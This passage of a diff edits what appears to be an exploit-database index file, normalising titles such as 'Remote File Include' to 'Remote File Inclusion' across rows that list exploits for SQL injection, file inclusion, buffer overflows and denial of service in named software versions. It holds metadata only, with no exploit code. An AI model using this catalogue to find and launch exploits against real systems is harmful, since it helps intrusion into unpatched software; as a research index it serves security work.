Suroboyo",cgi,webapps,0 -21660,platforms/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - Remote SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",php,webapps,0 +21660,platforms/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",php,webapps,0 21661,platforms/php/webapps/21661.txt,"DotProject 0.2.1 User Cookie Authentication Bypass",2002-07-29,pokleyzz,php,webapps,0 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0 21665,platforms/php/webapps/21665.txt,"phptax 0.8 - Remote Code Execution",2012-10-02,"Jean Pascal Pereira",php,webapps,0 -21666,platforms/linux/local/21666.txt,"soapbox <= 0.3.1 - Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0 +21666,platforms/linux/local/21666.txt,"soapbox 0.3.1 - Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0 21667,platforms/linux/local/21667.c,"MM 1.0.x/1.1.x - Shared Memory Library Temporary File Privilege Escalation",2002-07-29,"Sebastian Krahmer",linux,local,0 21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 Form Field HTML Injection",2002-07-29,delusion,php,webapps,0 21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0 @@ -18950,7 +18950,7 @@ id,file,description,date,author,platform,type,port 21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0 21674,platforms/linux/local/21674.c,"William Deich Super 3.x SysLog Format String",2002-07-31,gobbles,linux,local,0 21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0 -21676,platforms/php/webapps/21676.txt,"Bharat Mediratta Gallery 1.x - Remote File Include",2002-08-01,PowerTech,php,webapps,0 +21676,platforms/php/webapps/21676.txt,"Bharat Mediratta Gallery 1.x - Remote File Inclusion",2002-08-01,PowerTech,php,webapps,0 21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0 21678,platforms/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 Format String",2002-08-02,ghandi,solaris,remote,0 21679,platforms/cgi/webapps/21679.txt,"Dispair 0.1/0.2 - Remote Command Execution",2002-07-30,anonymous,cgi,webapps,0 @@ -19000,7 +19000,7 @@ id,file,description,date,author,platform,type,port 21724,platforms/php/webapps/21724.txt,"Ilia Alshanetsky FUDForum 1.2.8/1.9.8/2.0.2 File Modification",2002-08-19,"Ulf Harnhammar",php,webapps,0 21725,platforms/linux/remote/21725.c,"MySQL 3.20.32/3.22.x/3.23.x Null Root Password Weak Default Configuration (1)",2002-08-19,g0thm0g,linux,remote,0 21726,platforms/linux/remote/21726.c,"MySQL 3.20.32/3.22.x/3.23.x Null Root Password Weak Default Configuration (2)",2002-10-05,st0ic,linux,remote,0 -21727,platforms/php/webapps/21727.txt,"Mantis 0.15.x/0.16/0.17.x JPGraph Remote File Include Command Execution",2002-08-19,"Joao Gouveia",php,webapps,0 +21727,platforms/php/webapps/21727.txt,"Mantis 0.15.x/0.16/0.17.x JPGraph Remote File Inclusion Command Execution",2002-08-19,"Joao Gouveia",php,webapps,0 21728,platforms/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",cgi,webapps,0 21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0 @@ -19012,13 +19012,13 @@ id,file,description,date,author,platform,type,port 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,Metasploit,php,webapps,0 -21739,platforms/windows/dos/21739.pl,"JPEGsnoop <= 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 +21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 JLS File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 21742,platforms/php/webapps/21742.txt,"template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0 21743,platforms/php/webapps/21743.txt,"phpmybittorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0 -21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager <= 1.2.0.2 - Retention Policy",2012-10-04,"Piotr Chmylkowski",windows,webapps,0 -21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Include Command Execution",2002-08-22,"Jeroen Latour",php,webapps,0 +21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager 1.2.0.2 - Retention Policy",2012-10-04,"Piotr Chmylkowski",windows,webapps,0 +21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution",2002-08-22,"Jeroen Latour",php,webapps,0 21746,platforms/windows/dos/21746.c,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 21747,platforms/windows/dos/21747.txt,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 21748,platforms/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0 @@ -19058,7 +19058,7 @@ id,file,description,date,author,platform,type,port 21782,platforms/multiple/dos/21782.txt,"Oracle 8.1.x/9.0/9.2 TNS Listener Service_CurLoad Remote Denial of Service",2002-09-09,"Rapid 7",multiple,dos,0 21783,platforms/php/webapps/21783.txt,"phpGB 1.1/1.2 PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0 -21786,platforms/php/webapps/21786.php,"Blog Mod <= 0.1.9 - (index.php month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 +21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - (index.php month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link Denial of Service",2002-09-09,"Stefano Zanero",windows,dos,0 21790,platforms/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ authenticate Local Privilege Escalation",2002-06-28,"Charles Stevenson",unix,local,0 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0 @@ -19075,8 +19075,8 @@ id,file,description,date,author,platform,type,port 21802,platforms/cgi/webapps/21802.txt,"Lycos HTMLGear guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",cgi,webapps,0 21803,platforms/windows/remote/21803.txt,"Microsoft Internet Explorer 6 URI Handler Restriction Circumvention",2002-09-10,"Thor Larholm",windows,remote,0 21804,platforms/windows/remote/21804.c,"Trillian 0.6351/0.7x Identd Buffer Overflow",2002-09-18,"Lance Fitz-Herbert",windows,remote,0 -21805,platforms/unix/local/21805.c,"Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (1)",2002-09-18,BrainStorm,unix,local,0 -21806,platforms/unix/local/21806.c,"Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (2)",2002-09-18,zillion,unix,local,0 +21805,platforms/unix/local/21805.c,"Cisco VPN 5000 Client - Buffer Overrun Vulnerabilities (1)",2002-09-18,BrainStorm,unix,local,0 +21806,platforms/unix/local/21806.c,"Cisco VPN 5000 Client - Buffer Overrun Vulnerabilities (2)",2002-09-18,zillion,unix,local,0 21807,platforms/unix/local/21807.pl,"HP Tru64/OSF1 DXTerm Buffer Overflow",2002-07-03,stripey,unix,local,0 21808,platforms/windows/remote/21808.txt,"Microsoft VM 2000/3000/3100/3188/3200/3300/3802/3805 series JDBC Class Code Execution",2002-09-19,anonymous,windows,remote,0 21809,platforms/php/webapps/21809.txt,"Web Help Desk by SolarWinds - Stored XSS",2012-10-08,loneferret,php,webapps,0 @@ -19155,7 +19155,7 @@ id,file,description,date,author,platform,type,port 21880,platforms/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,multiple,remote,0 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution",2012-10-11,Metasploit,windows,remote,0 -21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 - (.png) ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0 +21889,platforms/windows/dos/21889.pl,"VLC Player 2.0.3 - (.png) ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0 21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0 21893,platforms/php/webapps/21893.php,"TightAuction 3.0 Config.INC Information Disclosure",2002-10-02,frog,php,webapps,0 @@ -19170,7 +19170,7 @@ id,file,description,date,author,platform,type,port 21902,platforms/windows/remote/21902.c,"Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 21903,platforms/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module Cross-Site Scripting",2002-10-03,Pistone,php,webapps,0 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0 -21905,platforms/php/webapps/21905.txt,"phpMyNewsLetter 0.6.10 - Remote File Include",2002-10-03,frog,php,webapps,0 +21905,platforms/php/webapps/21905.txt,"phpMyNewsLetter 0.6.10 - Remote File Inclusion",2002-10-03,frog,php,webapps,0 21906,platforms/php/webapps/21906.txt,"phpLinkat 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2002-10-04,Sp.IC,php,webapps,0 21907,platforms/windows/dos/21907.c,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (1)",2002-10-05,Morgan,windows,dos,0 21908,platforms/windows/dos/21908.pl,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (2)",2002-10-05,subj,windows,dos,0 @@ -19182,7 +19182,7 @@ id,file,description,date,author,platform,type,port 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0 21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0 33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta ",windows,dos,0 -21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection",2002-10-08,hish,php,webapps,0 +21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - SQL Injection",2002-10-08,hish,php,webapps,0 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse",2002-10-08,netmask,unix,remote,0 21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 - Cross-Site Scripting",2002-10-09,overclocking_a_la_abuela,asp,webapps,0 21921,platforms/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload",2002-10-09,hish,php,webapps,0 @@ -19239,7 +19239,7 @@ id,file,description,date,author,platform,type,port 21973,platforms/windows/dos/21973.pl,"SmartMail Server 1.0 BETA 10 Oversized Request Denial of Service",2002-10-31,"securma massine",windows,dos,0 21974,platforms/unix/remote/21974.pl,"LPRNG html2ps 1.0 - Remote Command Execution",2002-10-31,"Sebastian Krahmer",unix,remote,0 21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x Gozila.CGI Denial of Service",2002-11-01,"Jeep 94",hardware,dos,0 -21976,platforms/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Include",2002-11-01,"Karol Wiesek",php,webapps,0 +21976,platforms/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Inclusion",2002-11-01,"Karol Wiesek",php,webapps,0 21977,platforms/php/webapps/21977.txt,"PHP-Nuke 5.6 Modules.php SQL Injection",2002-11-01,kill9,php,webapps,0 21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4_D-Link DI-804 4.68/Dl-704 2.56 b5 Embedded HTTP Server DoS",2002-11-01,"Mark Litchfield",hardware,dos,0 21979,platforms/cgi/webapps/21979.txt,"ION Script 1.4 - Remote File Disclosure",2002-11-01,"Zero X",cgi,webapps,0 @@ -19267,7 +19267,7 @@ id,file,description,date,author,platform,type,port 22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,linux,local,0 22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php album parameter) - SQL Injection",2012-10-16,Zixem,php,webapps,0 22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component - (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 -22005,platforms/hardware/webapps/22005.txt,"visual tools dvr <= 3.0.6.16_ vx series <= 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 +22005,platforms/hardware/webapps/22005.txt,"visual tools dvr 3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos,0 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 @@ -19278,7 +19278,7 @@ id,file,description,date,author,platform,type,port 22014,platforms/linux/local/22014.c,"Traceroute-nanog 6 - Local Buffer Overflow",2002-11-12,"Carl Livitt",linux,local,0 22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 File Disclosure",2002-11-12,"Tim Brown",cgi,webapps,0 22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 POST Buffer Overflow",2002-11-13,Xpl017Elz,linux,remote,0 -22017,platforms/php/webapps/22017.txt,"PHPBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Include",2002-11-13,"Hai Nam Luke",php,webapps,0 +22017,platforms/php/webapps/22017.txt,"PHPBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion",2002-11-13,"Hai Nam Luke",php,webapps,0 22018,platforms/windows/remote/22018.pl,"keyfocus kf Web server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,windows,remote,0 22019,platforms/windows/dos/22019.pl,"IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service",2002-11-14,"securma massine",windows,dos,0 22020,platforms/multiple/remote/22020.pl,"Perception LiteServe 2.0 CGI Source Disclosure",2002-11-14,mattmurphy,multiple,remote,0 @@ -19301,11 +19301,11 @@ id,file,description,date,author,platform,type,port 22037,platforms/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 BETA 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps,0 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,"cr4wl3r ",php,webapps,0 22039,platforms/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 -22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <= 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 +22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0 22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 Script Injection",2002-11-25,"Pete Foster",php,webapps,0 -22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Include",2002-11-25,frog,php,webapps,0 +22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Inclusion",2002-11-25,frog,php,webapps,0 22045,platforms/cgi/webapps/22045.txt,"Working Resources BadBlue 1.7.1 - Search Page Cross-Site Scripting",2002-11-25,"Matthew Murphy",cgi,webapps,0 22046,platforms/linux/remote/22046.c,"Null HTTPD 0.5 - Remote Heap Corruption",2002-11-26,eSDee,linux,remote,0 22047,platforms/php/webapps/22047.txt,"FreeNews 2.1 Include Undefined Variable Command Execution",2002-11-26,frog,php,webapps,0 @@ -19351,9 +19351,9 @@ id,file,description,date,author,platform,type,port 22089,platforms/php/webapps/22089.txt,"PHP-Nuke 6.0 Web Mail Remote PHP Script Execution",2002-12-16,"Ulf Harnhammar",php,webapps,0 22090,platforms/php/webapps/22090.txt,"PHP-Nuke 6.0 Web Mail Script Injection",2002-12-16,"Ulf Harnhammar",php,webapps,0 22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 Format String",2002-12-16,"Marceta Milos",linux,remote,0 -22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal",2012-10-19,xistence,multiple,webapps,0 -22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus <= 5.5 build 5505 - Remote SYSTEM/root SQLi",2012-10-19,xistence,multiple,remote,0 -22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus <= 5.5 build 5505 - Remote SYSTEM SQLi (Metasploit)",2012-10-19,xistence,windows,remote,0 +22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 Path Traversal",2012-10-19,xistence,multiple,webapps,0 +22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQLi",2012-10-19,xistence,multiple,remote,0 +22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQLi (Metasploit)",2012-10-19,xistence,windows,remote,0 22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 - (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22098,platforms/php/webapps/22098.txt,"Joomla Tags (index.php tag parameter) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22099,platforms/php/webapps/22099.txt,"CMSQLITE 1.3.2 - Multiple Vulnerabiltiies",2012-10-19,Vulnerability-Lab,php,webapps,0 @@ -19371,7 +19371,7 @@ id,file,description,date,author,platform,type,port 22111,platforms/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 Shadow File Disclosure",2002-12-22,"Victor Pereira",cgi,webapps,0 22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 Information Disclosure",2002-12-30,"Dennis Rand",windows,remote,0 22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion",2002-12-30,"Dennis Rand",windows,remote,0 -22114,platforms/php/webapps/22114.txt,"PEEL 1.0 b Remote File Include",2002-12-31,frog,php,webapps,0 +22114,platforms/php/webapps/22114.txt,"PEEL 1.0 b Remote File Inclusion",2002-12-31,frog,php,webapps,0 22115,platforms/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 - menu.inc.php c_path Parameter RFI",2003-01-02,frog,php,webapps,0 22116,platforms/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI",2003-01-02,frog,php,webapps,0 22117,platforms/windows/dos/22117.txt,"iCal 3.7 Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0 @@ -19424,8 +19424,8 @@ id,file,description,date,author,platform,type,port 22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 users.php uid Parameter XSS",2003-01-14,snooq,php,webapps,0 22165,platforms/php/webapps/22165.txt,"Geeklog 1.3.7 comment.php cid Parameter XSS",2003-01-14,snooq,php,webapps,0 22166,platforms/php/webapps/22166.txt,"Geeklog 1.3.7 Homepage User Field HTML Injection",2003-01-14,snooq,php,webapps,0 -22167,platforms/php/webapps/22167.txt,"vAuthenticate 2.8 - Remote SQL Injection",2003-01-14,frog,php,webapps,0 -22168,platforms/php/webapps/22168.txt,"vSignup 2.1 - Remote SQL Injection",2003-01-14,frog,php,webapps,0 +22167,platforms/php/webapps/22167.txt,"vAuthenticate 2.8 - SQL Injection",2003-01-14,frog,php,webapps,0 +22168,platforms/php/webapps/22168.txt,"vSignup 2.1 - SQL Injection",2003-01-14,frog,php,webapps,0 22169,platforms/cgi/webapps/22169.pl,"Psunami Bulletin Board 0.x Psunami.CGI Remote Command Execution (1)",2003-01-13,dodo,cgi,webapps,0 22170,platforms/cgi/webapps/22170.pl,"Psunami Bulletin Board 0.x Psunami.CGI Remote Command Execution (2)",2003-01-13,spabam,cgi,webapps,0 22171,platforms/windows/remote/22171.txt,"Trend Micro OfficeScan 3.x CGI Directory Insufficient Permissions",2003-01-15,"Rod Boron",windows,remote,0 @@ -19445,11 +19445,11 @@ id,file,description,date,author,platform,type,port 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0 22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD save_item.php Arbitrary File Upload",2003-01-20,frog,php,webapps,0 22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0 -22279,platforms/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Include",2003-02-24,"Karol Wiesek",php,webapps,0 +22279,platforms/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",php,webapps,0 22189,platforms/linux/local/22189.txt,"MTink 0.9.x Printer Status Monitor Environment Variable Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0 22190,platforms/linux/local/22190.txt,"ESCPUtil 1.15.2 2 - Local Printer Name Buffer Overflow",2003-01-21,"Karol Wiesek",linux,local,0 22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service",2003-01-22,"Matthew Murphy",linux,dos,0 -22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 Packages.php Remote File Include",2003-01-22,spabam,php,webapps,0 +22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 Packages.php Remote File Inclusion",2003-01-22,spabam,php,webapps,0 22193,platforms/windows/local/22193.txt,"WinRAR 2.90/3.0/3.10 Archive File Extension Buffer Overrun",2003-01-22,nesumin,windows,local,0 22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0 22195,platforms/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote Include Command Execution",2003-01-22,MGhz,php,webapps,0 @@ -19463,9 +19463,9 @@ id,file,description,date,author,platform,type,port 22203,platforms/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command Arbitrary File Deletion",2003-01-27,"Wojciech Purczynski",solaris,local,0 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 File Disclosure",2000-09-13,"Niels Heinen",cgi,webapps,0 22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory/File Disclosure",2003-01-26,"Jouko Pynnönen",linux,remote,0 -22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Include",2003-01-30,Havenard,php,webapps,0 +22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Inclusion",2003-01-30,Havenard,php,webapps,0 22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - Malformed HTTP Request DoS",2003-01-30,"Nathan Neulinger",multiple,dos,0 -22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Include",2003-02-03,frog,php,webapps,0 +22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Inclusion",2003-02-03,frog,php,webapps,0 22209,platforms/php/webapps/22209.txt,"phpMyShop 1.0 compte.php SQL Injection",2003-02-03,frog,php,webapps,0 22210,platforms/openbsd/local/22210.txt,"OpenBSD 2.x/3.x CHPass Temporary File Link File Content Revealing",2003-02-03,"Marc Bevand",openbsd,local,0 22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 Avatar HTML Injection",2003-02-03,delusion,php,webapps,0 @@ -19496,8 +19496,8 @@ id,file,description,date,author,platform,type,port 22237,platforms/windows/dos/22237.txt,"Microsoft Office Picture Manager 2010 Crash PoC",2012-10-25,coolkaveh,windows,dos,0 22239,platforms/windows/dos/22239.txt,"Opera 6.0/7.0 Username URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,windows,dos,0 22240,platforms/windows/dos/22240.txt,"Opera 6.0/7.0 opera.PluginContext Native Method Denial of Service",2003-01-13,"Marc Schoenefeld",windows,dos,0 -22241,platforms/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 Skin Configuration Script Remote File Include",2003-02-09,MGhz,php,webapps,0 -22242,platforms/php/webapps/22242.txt,"Cedric Email Reader 0.4 Global Configuration Script Remote File Include",2003-02-09,MGhz,php,webapps,0 +22241,platforms/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 +22242,platforms/php/webapps/22242.txt,"Cedric Email Reader 0.4 Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 22243,platforms/linux/dos/22243.txt,"RARLAB FAR 1.65/1.70 File Manager Buffer Overflow",2003-02-11,3APA3A,linux,dos,0 22244,platforms/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",hardware,remote,0 22245,platforms/windows/dos/22245.txt,"Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow",2003-02-11,3APA3A,windows,dos,0 @@ -19537,9 +19537,9 @@ id,file,description,date,author,platform,type,port 22280,platforms/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution",2003-02-24,http-equiv,windows,remote,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 Cookie Validation",2003-02-24,"Simen Bergo",php,webapps,0 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 - dev sendphoto.php File Disclosure",2003-02-24,frog,php,webapps,0 -22283,platforms/php/webapps/22283.txt,"CuteNews 0.88 shownews.php Remote File Include",2003-02-25,Over_G,php,webapps,0 -22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - search.php Remote File Include",2003-02-25,Over_G,php,webapps,0 -22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 comments.php Remote File Include",2003-02-25,Over_G,php,webapps,0 +22283,platforms/php/webapps/22283.txt,"CuteNews 0.88 shownews.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 +22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - search.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 +22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 comments.php Remote File Inclusion",2003-02-25,Over_G,php,webapps,0 22286,platforms/unix/dos/22286.html,"Netscape 